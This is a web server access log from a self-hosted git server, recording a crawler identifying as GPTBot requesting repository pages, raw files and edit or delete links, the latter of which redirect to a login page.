"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:33:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:33:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21603] [Gzip 28.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 959] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11894] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:33:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15784] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html?display=source" [Client 74.7.227.38] [Length 16352] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" +[17/Feb/2026:16:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/launch.json?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" +[17/Feb/2026:16:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11546] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10472] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11565] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11941] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" +[17/Feb/2026:16:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11942] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" +[17/Feb/2026:16:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27529] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11945] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" +[17/Feb/2026:16:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42483] [Gzip 12.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42292] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11908] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" +[17/Feb/2026:16:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9748] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12170] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11288] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12170] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:33:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:33:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:33:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:33:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:33:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:33:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:33:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:33:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:33:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:33:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:33:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] 